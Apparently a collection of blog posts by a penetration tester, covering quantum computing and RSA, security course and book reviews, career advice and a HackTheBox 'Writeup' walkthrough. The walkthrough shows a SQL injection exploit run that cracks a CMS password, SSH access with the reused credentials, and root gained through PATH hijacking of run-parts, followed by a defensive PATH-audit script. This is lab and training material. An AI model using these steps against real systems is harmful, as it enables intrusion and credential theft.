Quantum Computing and IT security implications

This article is not for learning quantum computing (I am not the right person for that), but to understand some of the implications for IT security and maybe give some help in taking the very first steps.

Introduction to Quantum Computing for Dummies

Since it is so popular let us ask ChatGPT:

OK, now that it is all clear, let's move on!

I watched these as an easy-to-understand introduction to this complex topic.

Quantum Computers Explained in a Way Anyone Can Understand

Dig deeper into Quantum computing

If you want to dig deeper, have a look at this article, which also links some free introductory books:

https://builtin.com/software-engineering-perspectives/how-to-learn-quantum-computing

This also looks interesting:

https://towardsdatascience.com/the-ultimate-beginners-guide-to-quantum-computing-and-its-applications-5b43c8fbcd8f

Breaking RSA

A current discussion is when and how RSA will be broken.

RSA’s demise from quantum attacks is very much exaggerated, expert says

Expert says the focus on quantum attacks may distract us from more immediate threats.

https://arstechnica.com/information-technology/2023/01/fear-not-rsa-encryption-wont-fall-to-quantum-computing-anytime-soon/

One more article about this topic:

Fujitsu: Quantum computers no threat to encryption just yet

Heavily hyped tech bound for some sort of milestone by decade end

https://www.theregister.com/2023/01/24/fujitsu_quantum_encryption/

Implications in depth

And if you want to dig deeper into these topics, here are three fantastic resources:

Quantum computers are nuclear weapons of the tech – but their potential is immeasurable

As scientists across the world express their excitement about the development of quantum technology, others are worried about the dangers it poses to today’s encryption and the potential benefits it could offer to cybercriminals.

https://cybernews.com/crypto/quantum-computers-promises/

Make sure to watch the video at the end:

The Story of Shor’s Algorithm, Straight From the Source | Peter Shor

How Quantum Computers Break Encryption | Shor’s Algorithm Explained

Conclusion

For me it is hard to look into the future here; this field is much too complex and I have only some basic understanding. From what I see at the current point there is no direct impact, and we all should be aware that there is also some hype. Maybe you should start to consider what might happen if your current encryption is broken in the future. I hope I showed a path for starting research for everyone who is interested.

Quantum Computing can have a great impact on lots of fields; obviously IT security and encryption is only a very small fraction of it. I wonder what it will mean for all STEM fields like astronomy, material research, medicine, understanding the brain, the universe and all the rest.

Course Review: Active Directory Pentesting Full Course – Red Team Hacking

Link: https://www.udemy.com/course/active-directory-red-team-hacking/

Content

Tactics & Techniques

  • local/domain privilege escalation
  • local/domain enumeration
  • lateral movement
  • persistence

Used Tools

  • Powersploit
  • Mimikatz
  • Metasploit
  • Sherlock/Watson
  • Rubeus

Conclusion

  • does not go too deep, so good coverage, but sometimes explanations are missing
  • practical examples
  • the instructor also sometimes runs into problems without cutting them out, which is good to see imho
  • if you want to run the examples yourself you will need to set up your own lab
  • you should have some prior knowledge, for example in PowerShell, ADS, networking and pentesting in general
  • this is a beginner course for ADS red teaming
  • I gave 4/5 stars and for that price I can recommend the course
  • Hint: wait for discounts at Udemy

Softskills: CV, Job Application and Interviews

This one might be a bit too specific, since every country has its own CV and interview culture. For example, in the US you don't add a picture of yourself, while in Germany this is very common. There are surely many more differences, so please don't take everything here for granted in the area or country where you want to get a job. I try to be as general as possible here.

From my previous post Softskills: Networking for your Career you should be aware that getting a job through a personal network is a good way, and it could be the most promising option.

CV & Job Application

A couple of points for the CV & job application:

  • be honest; if people find out you lied or made things up, you are out
  • don't go into details that have nothing to do with the job you are applying for, unless it seems necessary
  • write everything else in detail; I like to have much information, but other people might have a different opinion
  • use a clean and easy-to-read format
  • write a great motivation letter for your application
  • prove facts, for example if you write that you have a certification, add a copy or scan of it to the application
  • check for grammar and spelling
  • if possible, let somebody read your application who can give good feedback

Job Interview

I was on both sides of the table, conducting interviews and also of course being the candidate.

  • know your CV well, you should be able to explain everything without looking it up
  • if you have a bad feeling you normally should not take the job, unless it is a huge chance for you or you can use it for jumping to a better job
  • prepare for the interview, think about what questions might be asked
  • try to prepare for standard questions like
    • what was your biggest mistake
    • where do you see yourself in five years
    • what is your biggest weakness
    • what do you expect from your employer
    • and so on
  • prepare for technical questions
    • there is nothing worse than, for example, saying you know XSS but not being able to explain the difference between a stored and a reflected XSS
    • have a look at the Daniel Miessler interview questions (see also below)
  • if you have weak spots in your CV you can try to handle them pro-actively; if not, prepare for critical questions
  • prepare questions that you want to ask; for me an interview always has to go in both directions

Links
https://us.experteer.com/magazine/should-you-put-a-photo-on-your-cv/
https://danielmiessler.com/study/infosec_interview_questions/
https://www.indeed.com/career-advice/resumes-cover-letters/motivation-letter

Softskills: Networking for your Career

Whether you are looking for a new job, enhancing your knowledge or finding like-minded people, networking is important for your career.

Social Networks

When I looked for my first job as a pentester I wrote to CEOs and company owners of smaller companies that I found interesting on Xing (which is mainly active in Germany), and later I also used LinkedIn. I got invitations to interviews and found a job.

I also use Twitter, but not as much as I did 2-3 years ago. You can still get information very quickly when you follow the right people. For example, when a PoC for an exploit is available it is posted fast here, but be careful and check the information.

On all networks you can use direct messages to contact people when you have questions; in my experience most people are happy to help.

But how to start? First follow and add people you know. Search for people who might be interesting for you and also add/follow them. When contacting someone for the first time, just say a few words about yourself. Share posts you find interesting and maybe start writing your own posts, for example a link to an interesting blog post you found or a short course review.

You can also be successful without social media accounts, but for me it was a booster. It is also useful to stay in contact with people you meet at…

Conferences & Meet-ups

Other great places for networking are conferences and local meetings. At local meetings (I visited the OWASP meeting in Cologne for some time) it is easy to get in touch with people in the area where you live, there are presentations and you can learn.

At conferences it depends strongly on what you expect. For networking it might be better to go to smaller conferences, especially if you don't know anybody. Bigger conferences are also good, but maybe a bit overwhelming at first.

You can get more contacts when participating actively, for example by giving a presentation or as a volunteer.

Or, when you are in the industry for a longer time, just meet with people you know.

And guess what? I got in touch with one of my employers at a conference.


Career Path Red Teaming

For some people Red Teaming seems to be something like the holy grail and many people want to do it. In my opinion a Red Teamer should have experience in Penetration Testing before starting. Some experience in DFIR might also be useful, or at least you should have some understanding of this topic.

For me (I have been planning and leading internal Red Team engagements for about two years now), Red Teaming is very different from pentesting, although experience there is important.

“Penetration testers have this problem where they frequently can’t see past the end of their Kali USB. They establish the false equivalence of: “China hacked $X; I can hack $X; therefore, I am an APT and an APT is like me.” An APT is literally the instantiation of a nation state’s will. It is not a toolchain.” 
https://medium.com/@thegrugq/cyber-ignorethe-penetration-testers-900e76a49500

This sums up my experience. Some pentesters think: OK, let's just use BloodHound, Mimikatz and Empire and start firing; when I am domain admin it is red teaming. Well, maybe kind of.

But do real attackers think that way? Think more about WHY a malicious actor is trying to hack you, and then how. What are attackers looking for? That might define the scope of your engagement. You should read threat intel and incident reports to stay up to date regarding TTPs and scope. When doing Red Teaming you should start thinking more in this direction.

I also tend to go through single scenarios, and not only full blown attack simulations, like:
• Account compromise
• Exfiltration if possible
• APT traffic simulation for testing and enhancing the capabilities of the blue team
• Phishing
• Watering hole attacks
• Malware simulation

This is also a good starting point for enhancing a penetration tester career, since usually you are not able to start with full blown Red Team engagements.

I can recommend "The Hacker Playbook" series; my review of the third issue is here. The book "Advanced Penetration Testing" is also a good read.

More recommendations:
• https://www.cobaltstrike.com/training 
• https://medium.com/@thegrugq/cyber-ignore-the-penetration-testers-900e76a49500
• https://www.pentesteracademy.com/redlabs
• https://github.com/aptnotes
• https://attack.mitre.org/
• https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2019.pdf?__blob=publicationFile&v=3

Review: Effective Information Security Writing

Writing good reports is in my opinion one of the most important tasks for people who work in security, no matter if in pentesting, forensics or other topics. The report is the final product of your work; it leaves an impression even after some time, and it represents your company, your department and yourself. Unfortunately some people underestimate this topic.

But there is a course with great content: Effective Information Security Writing by Chris Sanders.


Course Syllabus:
* Module 1: Telling a Story
* Module 2: Writing Penetration Testing Reports
* Module 3: Forensic Writing
* Module 4: Most Common Writing Mistakes

The price is pretty fair, $97 at the time of this writing. Even folks who don't like to write reports gave me great feedback, and I can highly recommend it myself. It takes about 6-8h to go through, you have access to forums, and in the end you get a certificate of completion. Although I have written lots of reports over the past years, I still got some great new ideas for improvement.

More about that topic:
https://twitter.com/ZephrFish/status/1246802541293248512
https://chrissanders.org/training/writing/
https://www.networkdefense.io/library/effective-information-security-writing/55514/about/
https://briannefahey.com/2018/02/effective-information-security-writing
https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf

Review Pentester Academy and AttackDefense Labs

Hello All, this is a review of Pentester Academy and AttackDefense Labs. The content is really huge:

Screenshot from: https://www.pentesteracademy.com/

So it is not possible to review all of it; this post is just meant to give a rough overview and some examples.

Pentester Academy

As said before, the courses section has 40+ courses available. The topics include for example (all from a security perspective, but some are also from a defender's viewpoint): Python, ADS, shellcoding (I did the SLAE in 2015, which also helped me with my OSCE certification), JavaScript, web app pentesting, some forensics topics, WiFi and network pentesting, exploitation and much more.

For a complete overview have a look here.

Currently I started the course Traffic Analysis: Tshark unleashed, so this is the short example for this post.

Screenshot from the Tshark course.

What is really handy is that you can just start the labs in the AttackDefense labs, so you don't need to set up your own VMs just to follow the courses:

Screenshot from one of the Traffic Analysis: Tshark unleashed course

What is also great is that you can download the videos, so you can watch them later.

As far as I can say, all the videos are more or less suitable for beginners.

AttackDefense Labs

The labs include a huge amount of topics, including: Webapps, MSF, Privilege Escalation, Exploiting, Wi-Fi, Forensics, Reversing, Cracking, Python and so on. Some labs include a small task, but others include for example full blown webapps like Juice Shop.

Some examples from the Web Apps labs.

In this case there was a small issue (for me): the labs time out after some time, which might be a bit annoying when working with a full web app. For the smaller labs I never had problems.

As advanced labs there are also some CTF style labs available.

Verifiable Badges

With verifiable badges it is possible to verify your knowledge to an external source, as I did here:

“The holder of this badge has successfully completed the Network Pentesting challenge exercises in Pentester Academy’s AttackDefense labs. These challenge exercises test a practical understanding of how to perform remote network reconnaissance of various infrastructure components.”
(https://www.credential.net/b5050be1-05c9-41fa-93a9-ea0b5cd8825f#.Xg8KBMQX5XM.twitter)

As far as I could see, all badges have three small challenges where you have to find flags (like a small CTF). Badges are available for lots of topics (19 badges are available at the time of this writing), and most of them can be done after you have viewed and worked through the courses.

Certifications

It is also possible to take certification exams (like the SLAE): https://www.pentesteracademy.com/exam

This way it is possible to take exams from Pentester Academy (if you are subscribed) without buying the whole course.

Pricing at time of this writing

Conclusion

My conclusion after using it myself and speaking to some folks who are also using it:

  • it is affordable
  • the content is huge
  • the courses are a great resource, especially for beginners
  • courses and labs suit both attackers and defenders
  • I like the badges

For me, Pentester Academy and AttackDefense Labs are highly recommended.


Hackthebox writeup

Yes, the machine itself is called writeup. My first step was running nmap:

# nmap 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 21:54 CEST
Nmap scan report for 10.10.10.138
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds


# nmap -A -p 22,80 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 22:06 CEST
Nmap scan report for 10.10.10.138
Host is up (0.022s latency).


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   20.28 ms 10.10.12.1
2   20.47 ms 10.10.10.138


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds 

More info gathering of the web service

As you can see CMS Made Simple is being used.

Exploitation of the website

After digging around a bit with sqlmap and Burp without success I searched for an exploit, and voila:
https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html

The exploit is also able to crack the recovered hash, so I used rockyou.txt as a wordlist:

# python cmsmadesimple22-sql.py -u http://10.10.10.138/writeup/ -c -w ./rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9 

The CMS login is protected with a .htaccess file, and the creds are not valid there. Good that there is a thing called password re-use.

User flag

But SSH worked with the creds:

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux


The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.


Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul  4 14:51:59 2019 from 10.10.12.57
jkr@writeup:~$
jkr@writeup:~$ ls
pspy64s user.txt
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978 

So the user flag was done.

Root flag

For escalating to root I first used exploit suggester and tried the exploits, but without success.

So I did some research and came across a tool called pspy. For transferring the file I used Apache and wget.

jkr@writeup:/tmp$ ./pspy64
...
root      2456  0.0  0.6 108644  6940 ?        Ss   15:10   0:00 sshd: jkr [priv]
root      2468  0.0  0.0   4276   756 ?        S    15:10   0:00 sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
root      2469  0.0  1.0  40364 10348 ?        S    15:10   0:00 /usr/bin/python /usr/local/bin/run-parts --lsbsysinit /etc/update-motd.d
root      2470  0.0  0.0   4276   732 ?        S    15:10   0:00 /bin/sh -i 
...

What does that mean? run-parts is started by root through a PATH lookup, and /usr/local/sbin is the first directory in that PATH. If we can put a file there we win.

The file looks like:

cat /root/root.txt >> /tmp/.testing

Then it is straightforward:

jkr@writeup:/tmp$ vi /usr/local/sbin/run-parts
jkr@writeup:/tmp$ chmod +x  /usr/local/sbin/run-parts
jkr@writeup:/tmp$ ls -al
total 4380
drwxrwxrwt  2 root root    4096 Jul  7 16:30 .
drwxr-xr-x 22 root root    4096 Apr 19 07:31 ..
-rw-r--r--  1 root root      33 Jul  7 16:30 .testing
jkr@writeup:/tmp$ cat .testing
eeba47f60b48ef92b734f9b6198d7226 

And that was it :).
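The misconfiguration behind this box is a directory that non-root users can write to sitting ahead of the real binary in the PATH of a root process. The following hardening check is an added example and not part of the original writeup: it pulls the PATH= assignment out of a pspy/ps style command line and reports every PATH directory that could be used to shadow the binary. The directory tree it audits is constructed in a temp folder (the `build_demo_layout` helper, the `trusted_uid` parameter and the `Finding` type are my own names).

```python
"""Audit the PATH of a privileged job for directories that can shadow a binary."""
from __future__ import annotations

import os
import re
import stat
import tempfile
from dataclasses import dataclass

PATH_RE = re.compile(r"\bPATH=(\S+)")


@dataclass
class Finding:
    directory: str
    reason: str


def path_from_cmdline(cmdline: str) -> list[str]:
    """Extract the PATH= value from a process command line (pspy/ps style)."""
    m = PATH_RE.search(cmdline)
    return [d for d in m.group(1).split(":") if d] if m else []


def audit_path(dirs: list[str], binary: str, trusted_uid: int = 0) -> list[Finding]:
    """Report PATH entries, in lookup order, that untrusted users could write to.

    Stops at the first directory that actually contains `binary`, because the
    shell never consults later entries; only earlier ones can shadow it.
    """
    findings: list[Finding] = []
    for d in dirs:
        try:
            st = os.stat(d)
        except FileNotFoundError:
            continue  # absent entries cannot be written into (parent checks are out of scope)
        if st.st_mode & stat.S_IWOTH:
            findings.append(Finding(d, "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append(Finding(d, f"writable by gid {st.st_gid}"))  # the writeup case
        elif st.st_uid != trusted_uid:
            findings.append(Finding(d, f"owned by uid {st.st_uid}, not trusted"))
        if os.path.exists(os.path.join(d, binary)):
            break
    return findings


def build_demo_layout() -> str:
    """Construct a throw-away tree mirroring the box: a writable dir ahead of the real binary."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    local_sbin = os.path.join(root, "usr/local/sbin")  # the hole: anyone may write here
    usr_bin = os.path.join(root, "usr/bin")            # where the real binary lives
    os.makedirs(local_sbin)
    os.makedirs(usr_bin)
    os.chmod(local_sbin, 0o777)
    os.chmod(usr_bin, 0o755)
    with open(os.path.join(usr_bin, "run-parts"), "w") as f:
        f.write("#!/bin/sh\n")
    # Constructed pspy-style line, same shape as the one observed on the box.
    return f"sh -c /usr/bin/env -i PATH={local_sbin}:{usr_bin} run-parts --lsbsysinit /etc/update-motd.d"


def run_demo() -> list[Finding]:
    cmdline = build_demo_layout()
    return audit_path(path_from_cmdline(cmdline), "run-parts", trusted_uid=os.getuid())


if __name__ == "__main__":
    for f in run_demo():
        print(f"[!] {f.directory}: {f.reason}")
```

On a real host you would feed it the PATH lines pspy or ps show for root-owned jobs and fix any hit by tightening the directory's mode or group.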

Useful add-ons for Webapp Pentesting and Bug Bounty

So here is just a very short one. Every time I have to set up a new pentest machine, I have to look it up again, so here is a small list of browser add-ons that are useful for webapp pentesting (using Firefox):

  • wappalyzer
  • Temp Mail
  • Hackbar Quantum
  • retire.js
  • Foxy Proxy Basic
  • shodan.io
  • Export Cookies

Book review: Real-World Bug Hunting

One of the good things about Defcon is that there is a No Starch Press store in the vendor area.

So I bought the book for the flight, but it took a bit longer until I had finished it.

The book has 20 chapters, starting with Bug Bounty Basics. The next 17 chapters go through different classes of vulnerabilities like XSS, SQLi, memory corruption, CSRF and so on.

After an explanation of the vulnerability itself, real reports are included with further hints. At the end of each chapter the reader can find useful takeaways.

The last two chapters are not about bugs: one is about finding bugs in general, including some descriptions of tactics and tools. The last chapter is about writing a good report, communication with the companies and how to deal with the different programmes, which seems very useful to me.

Real-World Bug Hunting helps to maximize payouts and find more bugs. It shows lots of attack vectors and creative ways of exploiting them.

The book is not for beginners. I recommend having a look at the recommendations list, the bug bounty beginners and the penetration tester basics articles for more resources.

Real-World Bug Hunting: A Field Guide to Web Hacking
Author: Peter Yaworski
Content: A very practical guide to bug hunting and bug bounties
Career: Penetration Tester, Bug Bounty
Level: Beginner, Intermediate